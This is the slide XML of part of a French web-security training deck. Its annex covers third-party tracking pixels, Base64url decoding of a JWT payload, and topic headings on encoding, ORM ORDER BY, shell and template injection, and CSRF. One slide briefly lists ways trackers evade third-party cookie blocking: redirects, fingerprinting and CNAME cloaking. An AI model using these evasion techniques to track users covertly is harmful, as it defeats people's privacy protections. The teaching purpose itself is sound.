              <a:t>XSS, CSP, mass assignment : déjà faits. On les nomme, on n’y revient pas trois heures.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="TextBox 6"/>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8" name="TextBox 7"/>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180 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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585216"/>
            <a:ext cx="10058400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE  ·  AU CAS OÙ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Six extras. Dans cet ordre.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1335024"/>
            <a:ext cx="101498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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1536192"/>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00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="1554480"/>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Tracking  ·  un cookie, plusieurs sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="1572768"/>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extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1956816"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2157984"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2176272"/>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Base64url  ·  ce que le JWT a caché ce matin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2194560"/>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extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2578608"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2779776"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2798064"/>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Encoder  ·  le bon outil selon l’endroit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2816352"/>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extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3200400"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3401568"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3419856"/>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ORM  ·  ORDER BY, c’est encore du SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3438144"/>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extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3822192"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4023360"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="4041648"/>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Shell et templates  ·  même réflexe que SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId9"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="4059936"/>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extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4443984"/>
            <a:ext cx="996696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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="4645152"/>
            <a:ext cx="731520" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="4663440"/>
            <a:ext cx="6949440" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSRF  ·  SameSite, plus un token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId10"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="4681728"/>
            <a:ext cx="2103120" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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0</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764438" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tracking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ANNEXE · tracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les cookies sont par domaine. Alors comment on vous suit partout ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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shop.fr ne lit pas les cookies de news.fr. C’est la règle. Personne ne vole le cookie de l’autre site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le tracker n’est pas shop.fr. C’est un troisième domaine, inclus dans les DEUX pages. Pixel, iframe, script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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0</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764438" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tracking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ANNEXE · tracking</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Un pixel. Deux sites. Un seul id.</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Ce n’est pas le cookie de shop.fr qui voyage</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&lt;!-- sur shop.fr ET sur news.fr --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img src="https://tracker.com/pixel.gif"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># 1. Le navigateur demande pixel.gif à tracker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># 2. Il envoie les cookies DE tracker.com  (pas ceux de shop.fr)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># 3. Première fois : Set-Cookie: id=deadbeef; SameSite=None; Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># 4. Sur news.fr, même pixel : Cookie: id=deadbeef</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># tracker.com sait que c'est le même navigateur. Deux visites, un profil.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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First-party : cookie de la page que vous voyez. Third-party : cookie d’une ressource d’ailleurs. La pub n’a pas besoin de lire shop.fr.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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0</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764438" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tracking</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ANNEXE · tracking</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Pourquoi ça marche encore. Pourquoi ça casse.</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SameSite=None; Secure</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Sans ça, Chrome n’envoie plus le cookie en third-party. Avec ça, le pixel revoit son id.</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Safari / Firefox</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Third-party cookies coupés. Le pixel arrive nu. Le profil se casse.</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Les contournements</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Redirect via tracker.com (il redevient first-party une seconde). Fingerprint (pas de cookie). CNAME : metrics.shop.fr pointe chez le tracker.</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Chez vous</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HttpOnly ne change rien ici : le pixel n’a pas besoin de JS. C’est le navigateur qui envoie le Cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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On ne traverse pas les domaines. On EST le troisième domaine, collé partout où le pixel est.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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Base64url</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184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ANNEXE · Base64url</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Ce que le JWT a caché ce matin</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btoa / atob suffisent pour LIRE. Ici : le padding, et les deux caractères.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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1</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Base64url</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ANNEXE · Base64url</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Base64url, pas Base64. Un JWT, c’est ça.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="395935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395935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1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Console  ·  le milieu du jeton, en clair</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="3575304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// JWT : + devient -    / devient _    pas de =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>function b64urlEncode(s) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  return btoa(s).replaceAll('+','-').replaceAll('/','_').replaceAll('=','');</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function b64urlDecode(s) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const pad = s + '='.repeat((4 - s.length % 4) % 4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  return atob(pad.replaceAll('-','+').replaceAll('_','/'));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>b64urlEncode(JSON.stringify({ sub: "admin", name: "Anne" }))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>JSON.parse(b64urlDecode("eyJzdWIiOiJhZG1pbiIsIm5hbWUiOiJBbm5lIn0"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>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Vous l’avez lu ce matin dans jwt.io. Vous n’implémentez pas JWT à la main en prod. La signature, c’était le point. Ça, c’est l’enveloppe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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680313" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encoder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ANNEXE · encoder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
